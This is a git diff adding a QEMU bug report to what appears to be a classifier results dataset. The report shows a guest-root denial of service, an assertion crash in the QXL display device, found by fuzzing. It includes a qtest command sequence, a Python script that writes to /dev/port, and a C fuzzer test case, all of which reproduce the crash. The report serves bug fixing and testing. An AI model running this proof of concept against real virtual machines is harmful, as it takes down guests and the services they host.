summary refs log tree commit diff stats
path: root/results/classifier/gemma3:12b/device/1829
diff options
context:
space:
mode:
Diffstat (limited to 'results/classifier/gemma3:12b/device/1829')
-rw-r--r--results/classifier/gemma3:12b/device/182989
1 files changed, 89 insertions, 0 deletions
diff --git a/results/classifier/gemma3:12b/device/1829 b/results/classifier/gemma3:12b/device/1829
new file mode 100644
index 00000000..c4ad59f2
--- /dev/null
+++ b/results/classifier/gemma3:12b/device/1829
@@ -0,0 +1,89 @@
+
+DoS via assert failure by guest user
+Description of problem:
+As root in guest VM user can execute special script, which crashes the whole VM with error
+
+```plaintext
+hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
+```
+Steps to reproduce:
+1. This bug can be reproduced with:
+
+   ```bash
+   cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
+   outl 0xcf8 0x8000101c
+   outl 0xcfc 0xc000
+   outl 0xcf8 0x80001001
+   outl 0xcfc 0x01000000
+   outl 0xc006 0x00
+   EOF
+   ```
+2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
+
+   ```python
+   import os
+   f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\x80\x00\x10\x1c')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\xc0\x00')
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\x80\x00\x10\x01')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\x01\x00\x00\x00')
+   l = os.lseek(f, 0xc006, 0)
+   os.write(f, b'\x00')
+   ```
+
+   This script causes VM to crash.
+
+   [PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)
+Additional information:
+This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
+
+```plaintext
+/*
+ * Autogenerated Fuzzer Test Case
+ *
+ * Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
+ *
+ * This work is licensed under the terms of the GNU GPL, version 2 or later.
+ * See the COPYING file in the top-level directory.
+ */
+
+#include "qemu/osdep.h"
+
+#include "libqtest.h"
+
+/*
+ * cat << EOF | qemu-system-x86_64 -vga qxl -hda \
+ * ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
+ * outl 0xcf8 0x8000101c
+ * outl 0xcfc 0xc000
+ * outl 0xcf8 0x80001001
+ * outl 0xcfc 0x01000000
+ * outl 0xc006 0x00
+ * EOF
+*/
+static void test_qxl_set_mode(void)
+{
+QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
+qtest_outl(s, 0xcf8, 0x8000101c);
+qtest_outl(s, 0xcfc, 0xc000);
+qtest_outl(s, 0xcf8, 0x80001001);
+qtest_outl(s, 0xcfc, 0x01000000);
+qtest_outl(s, 0xc006, 0x00);
+qtest_quit(s);
+}int main(int argc, char **argv)
+{
+    const char *arch = qtest_get_arch();
+
+    g_test_init(&argc, &argv, NULL);
+
+   if (strcmp(arch, "x86_64") == 0) {
+        qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
+   }
+
+   return g_test_run();
+}
+```